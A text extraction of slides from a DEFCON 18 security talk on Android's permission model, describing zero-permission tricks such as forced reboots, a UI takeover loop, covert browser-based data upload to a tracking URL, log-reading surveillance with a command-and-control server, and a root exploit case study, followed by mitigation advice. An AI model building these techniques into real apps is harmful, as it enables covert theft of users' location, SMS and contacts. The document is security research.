defcon 18 lineberry not the per missions you are looking for
TRANSCRIPT
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
1/87
THESE ARENT THEPERMISSIONS YOURE
LOOKING FOR
Anthony Lineberry
David Luke RichardsonTim Wyatt
DefCon 18
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
2/87
AGENDA
Android Internals Overview
Security/Permission Model
Why Ask For Permission When YouCan Ask For Forgiveness?
Log-Cat Our Inside Mole
The Ultimate Permission(Yes, were talking about root)
Mitigation
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
3/87
ANDROID INTERNALSDiving Into the Belly of the Beast
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
4/87
ANDROID MANIFEST
AndroidManifest.xml Every application must have one
Declares the package name, a unique identifier for every app
Describes applications components (Activities, Services,BroadcastReceivers, etc)
Declares requested permissions needed to access protectedAPIs (If only there were a way to get around that...)
Declares permissions other applications are required to have
to interact with applications components
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
5/87
ACTIVITY
A way for users to interact with
the application
Composed of Views:
Button
TextView
ImageView
etc...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
6/87
ACTIVITY
Managed as an Activity stack
New/foreground activity on top of stack. In running/active state
Previous Activities below in pausedstate
Removed from stack when Activity finishes
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
7/87
ACTIVITY
An application can star t another applications Activity!
Activity runs in its applications process.
Callee doesnt necessarily have access to Activitys data
Permission attribute in manifest can restrict who can start thepermission
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
8/87
INTENT
An abstract description of anoperation to be performed
Simple IPC for applications
Intents can be sent with data
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
9/87
INTENT Can be used to start an Activity with startActivity()
Intents can be broadcast system wide with sendBroadcast()
Communicate with a background Service
Two main components:
Action
Data (URI: http:, content:, geo:, etc...)
http://www.google.com/http://www.google.com/ -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
10/87
BROADCAST RECEIVER
Receives an Intent
Can be created dynamically with registerBroadcast() ordeclared in the manifest with the tag
Receives two types of broadcasts:
Normal Broadcasts Asynchronous; Cannot be aborted
Ordered Broadcasts Delivered serially; Can be aborted orass result to next receiver
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
11/87
BROADCAST RECEIVER
Permissions can be enforced
Sender can declare permissionfor who can receive the Intent
Receiver can declare permissionfor who can send an Intent to it
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
12/87
SERVICE
Component to do work in the background
NOT a separate process
NOT a thread
Kind of like an Activity without a UI
Can enforce access to service with a required permission
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
13/87
SECURITY/PERMISSIONMODEL
The Mythical Sandbox
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
14/87
THE SANDBOX
Not a VM sandbox as many believe
Unix multi-user (uid/gid) sandbox!
Each app is a different uid
Lightweight VM running for each process
Breaking out of the VM gains you nothing
Apps can request to share a uid (Both must be signed withthe same key)
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
15/87
PERMISSIONS
Default application has no permissions granted
Finer grained access to content/APIs
android.permission.READ_SMS
android.permission.CHANGE_WIFI_STATE
etc..
Declared in AndroidManifest.xml
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
16/87
WHY ASK FOR PERMISSIONWHEN YOU CAN ASK FOR
FORGIVENESS?
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
17/87
WHY PERMISSIONS MATTER
Permissions gate what anApp can do
Users are required to OKpermissions beforedownloading an App
Users can decipher to somedegree whether permissionsare appropriate
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
18/87
WHY PERMISSIONS MATTERWHY PERMISSIONS MATTER
VS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
19/87
WHAT DOES 0 PERMISSIONS
MEAN?
No permission screen at all!
Straight to download
Why should a user worryabout an App Androiddoesnt warn about?
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
20/87
REBOOT
WITH 0 PERMISSIONS
REBOOT permission is not normally grantable to apps.
Requires SystemOrSignature
But that wont stop us!
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
21/87
There are many approaches
depending on Android OSVersion
The easiest and most
reliable weve found so farinvolves Toast notifications
REBOOT
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
22/87
Every time you try to display a Toast it creates aweak JNI reference in system_server
REBOOT
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
23/87
At 2001* global references system_server SIGSEGVs
Exact number depends on hardware and OSversion
REBOOT
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
24/87
Custom Toasts are alsoimplementable, which
can display any view
Including invisibleviews!
REBOOT
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
25/87
RECEIVE_BOOT_COMPLETE
WITH 0 PERMISSIONS Permission to automatically start at
boot
Too easy - The permission isntchecked!
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
26/87
START ON INSTALL
WITH 0 PERMISSIONS Interesting trick to use in conjunction with another attack
No permission exists to allow this functionality
Google Analytics referrer tracking to the rescue!
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
27/87
START ON INSTALL
WITH 0 PERMISSIONS
Just write your own Receiver
But there are some caveats...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
28/87
START ON INSTALL
WITH 0 PERMISSIONS Requires referrer included in URL leading to App
Admob
Weblink
OR Android 2.2
Always includes referrer info
http://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaignhttp://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaign -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
29/87
CIRCLE OF DEATHUI HOSTILE TAKEOVER WITH 0 PERMISSIONS
Launch activity thatconsumes all KeyPresses
Cant swallow HOME or
long press of HOME
Relaunch when Activity exits
Activity cant launch itself
when destroyed, however
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
30/87
So create a circle of death
When Activity is destroyed, launch a Service.Service relaunches destroyed Activity
CIRCLE OF DEATH
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
31/87
To remove boot into safemode (No non-system
apps are able to run) anduninstall the maliciousapplication.
Bonus points: Maximizevolume and play anobnoxious sound.
CIRCLE OF DEATH
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
32/87
Apps or games not requestingINTERNET seem low risk.
Your sandbox cant access theinternet.
Ask your neighbor!
Pop open a browser. NetHack
UPLOAD
WITH 0 PERMISSIONS
http://mysite.com/data?lat=http://mysite.com/data?lat= -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
33/87
Can we do this secretly?
Obscuring browser (onPause())stops page from loading.
UPLOAD
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
34/87
How about we only pop up browsers when the screen is off?
Need to close browser when the screen turns on
Bonus Points: Redirect to http://www.google.comwhen youre done (or read browser history from logs)
UPLOAD
WITH 0 PERMISSIONS
http://google.com/http://google.com/http://google.com/ -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
35/87
But what about two way communication?
UPLOAD
WITH 0 PERMISSIONS
http://67.180.50.243:8080/track?lat=123.2&lon=32.2&count=http://67.180.50.243:8080/track?lat=123.2&lon=32.2&count= -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
36/87
INTERNET
WITH 0 PERMISSIONS
Pop browser to page with downloadable content-type
(http://mysite.com/data.zip)
Default Android browser automatically saves it to /sdcard/
downloads/data.zip
But there are some downsides...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
37/87
No way to clear notifications
To clean up the filesystem you needto request
WRITE_EXTERNAL_STORAGE
Automatically requested if youtarget Android 1.5
INTERNET
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
38/87
How about a custom URI receiver?
Google Maps uses
geo:latitude,longitude?zoom
to automatically launch their App
We can do the same!
INTERNET
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
39/87
We can register ourselves fornethack://
Redirect our page from before tonethack:data?param=server_data
This has to be an , not a (It is meant for foreground interactions)
INTERNET
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
40/87
Activity is never seen if you call finish() in onCreate()
Data is available in the Intent
Bonus Points: New tab for nethack URI and redirect original
page to http://google.com
INTERNET
WITH 0 PERMISSIONS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
41/87
INTERNET
WITH 0 PERMISSIONS
Demo
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
42/87
APPLICATION LOGGING
import android.util.Log;
...
publicclass MyClass {...
privatestaticfinal String TAG = "MyLogTag";
...
Log.d(TAG, "Some log content goes here);
...
}
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
43/87
LOG DEVICES
Main /dev/log/main
Events /dev/log/events
Radio /dev/log/radio
System /dev/log/system
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
44/87
/DEV/LOG/EVENTS
This isnot the main "logcat" debugging log (Log)!
These diagnostic events are for system integrators,not application authors.
(android.util.EventLog reference)
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
45/87
/DEV/LOG/RADIO
Radio command stream and debug data
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
46/87
/DEV/LOG/MAIN
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
47/87
LOGCAT
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
48/87
PERMISSIONS
Ability to read logs is gated by android.permission.READ_LOGS
shell is granted this permission for adb debugging
READ_LOGS is in some ways an alias for READ*
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
49/87
THE CLIENT
Android Service that requests:
android.permission.READ_LOGS
android.permission.INTERNET
Downloads policies from the server
Periodically delivers logs matching regex
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
50/87
LOGCATDEVICE
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
51/87
LOGMONITOR
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
52/87
MONITOR SERVICE
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
53/87
SERVER
Rails server supplies C&C and processes device data
Supplies per-device policies
Receives logs meeting policies
Provides an interface to explore logs from multiple devices
Extracts and post-processes log data
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
54/87
POLICIES, ETC.
Threw out a few random keywords (insert, update, delete, intent,content, http, etc.)
Picked a couple of pieces of data to toss around
Setup initial expressions and started pushing data through devices.
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
55/87
DB_SAMPLE
Logs the first 64 characters of a sampling of queries
Sample rate is based on query execution time
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
56/87
CONTENT_SAMPLE
Similar to db_sample, but applies to content provideroperations
GET TASKS AND DUMP
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
57/87
GET_TASKS
DUMP
GET_TASKS AND DUMP
WITH READ_LOGS
READ HISTORY BOOKMARKS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
58/87
READ_HISTORY_BOOKMARKS
WITH READ_LOGS
READ SMS
http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m/search?q=blackhat&aq=f&oq=&aqi=g6-k0d0t0&fkt=4484&fsdt=19163&csll=&action=<oken=ae3da9c5f9727http://www.google.com/m?client=ms-android-verizonhttp://www.google.com/m?client=ms-android-verizonhttp://www.google.com/m?client=ms-android-verizonhttp://www.google.com/m?client=ms-android-verizon -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
59/87
READ_SMS
WITH READ_LOGS
READ CONTACTS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
60/87
READ_CONTACTS
WITH READ_LOGS
ACCESS COARSE LOCATION
mailto:[email protected]:[email protected] -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
61/87
ACCESS_COARSE_LOCATION
WITH READ_LOGS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
62/87
RESOLVING LOCATION
ACCESS FINE LOCATION
http://cellid.labs.ericsson.net/json/lookup'http://cellid.labs.ericsson.net/json/lookup' -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
63/87
ACCESS_FINE_LOCATION
WITH READ_LOGS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
64/87
A STORY ... ABOUT 3 GUYS
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
65/87
HEADING DOWN 101 ...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
66/87
TO SFO
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
67/87
AND HEAD TO VEGAS ...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
68/87
ARRIVING AT MCCARRAN ...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
69/87
TAKE A CAB ACROSS TOWN ...
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
70/87
TO CAESARS PALACE
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
71/87
TO DEFCON 18
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
72/87
THE ULTIMATE PERMISSIONYes, Were Talking About Root
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
73/87
THE ULTIMATE PERMISSION
Phones ship locked down
Everyone wants to use their phone to its full potential
Communities surrounding the rooting of phones have formed
Third party ROMs available to users now
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
74/87
HOW DOES ONE GET ROOT?
Android uses a Linux kernel (duh)
Lookup old kernel vulns and see if they work!
1.5 (Cupcake) using 2.6.27 kernel
1.6 (Donut), 2.0, 2.1(Eclair) using 2.6.29
2.2 (Froyo) using 2.6.32
3.0 (Gingerbread) will use 2.6.33/34 (Q4/2010)
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
75/87
HOW DOES ONE GET ROOT?
Old/unpatched libraries!
suid binaries with vulns
Pretty much any traditional way since this is Linux
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
76/87
CASE STUDY
Similar to libudev vuln (CVE-2009-1185). Discovered bySebastian Krahmer
Patched in Android 4 days after exploit published
Failed check of NETLINK message origin(Did it come from the kernel? Or did a user send it?...)
Who was vulnerable to this?...
uevent origin vuln
http://git.kernel.org/?p=linux/hotplug/udev.git;a=commitdiff;h=e2b362d9f23d4c63018709ab5f81a02f72b91e75http://git.kernel.org/?p=linux/hotplug/udev.git;a=commitdiff;h=e2b362d9f23d4c63018709ab5f81a02f72b91e75 -
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
77/87
CASE STUDY
Rewrote exploit to run as JNI code from the APK
(With zero permissions!)
uevent origin vuln
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
78/87
CASE STUDY
Rewrote exploit to run as JNI code from the APK
(With zero permissions!)
Every flagship phone...
uevent origin vuln
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
79/87
CASE STUDY
Rewrote exploit to run as JNI code from the APK
(With zero permissions!)
Every flagship phone...
...Of every major carrier in the US
uevent origin vuln
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
80/87
CASE STUDY
Rewrote exploit to run as JNI code from the APK
(With zero permissions!)
Every flagship phone...
...Of every major carrier in the US
Oops.
uevent origin vuln
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
81/87
THE ROOTING PROBLEM
People want their phones rooted
Rooting is being viewed as a vehicle for modding
Ignoring the large pink elephant security issues
Unwilling to make details public for fear of OEM fixing bug
Leaves everyone with major vulnerabilities
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
82/87
WHY ARE PEOPLE ROOTING
Modding phones
Patching process is slow; users want access to latest andgreatest releases
Tethering (Free additional features)
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
83/87
WHAT CAN YOU DO?
Dont assume lack of permissions means data is private
Does the app really need READ_LOG permissions?(Probably not)
Keep your phone patched up to date
Users
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
84/87
WHAT CAN YOU DO?
Users are trusting you with access to their private data
Be careful what you do with that...
Be paranoid about what you log
If others dont need to access your components, enforce anaccess permission
Developers
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
85/87
WHAT CAN YOU DO?
See developer advice
Set a good example for other developers!
Why should they care if they leak private info if you are
already doing it too?
Please patch your libraries/kernels
OEMs
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
86/87
QUESTIONS?Come see us in Track 1 Q/A room!
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
87/87
REFERENCES
SDK Reference Docs
http://developer.android.com/reference/packages.html
Jon Oberheide - Googles Android Platform (CanSecWest 2009)
http://jon.oberheide.org/files/cansecwest09-android.pdf
Jesse Burns - Exploratory Android Surgery (BlackHat USA 2009)
https://www.isecpartners.com/files/iSEC_Android_Exploratory_Blackhat_2009.pdf
CVE-2009-1185 - https://bugzilla.redhat.com/show_bug.cgi?id=495051
http://c-skills.blogspot.com/2010/07/android-trickery.html
http://developer.android.com/reference/packages.htmlhttp://jon.oberheide.org/files/cansecwest09-android.pdfhttps://www.isecpartners.com/files/iSEC_Android_Exploratory_Blackhat_2009.pdfhttps://bugzilla.redhat.com/show_bug.cgi?id=495051https://bugzilla.redhat.com/show_bug.cgi?id=495051https://bugzilla.redhat.com/show_bug.cgi?id=495051https://www.isecpartners.com/files/iSEC_Android_Exploratory_Blackhat_2009.pdfhttps://www.isecpartners.com/files/iSEC_Android_Exploratory_Blackhat_2009.pdfhttp://jon.oberheide.org/files/cansecwest09-android.pdfhttp://jon.oberheide.org/files/cansecwest09-android.pdfhttp://developer.android.com/reference/packages.htmlhttp://developer.android.com/reference/packages.html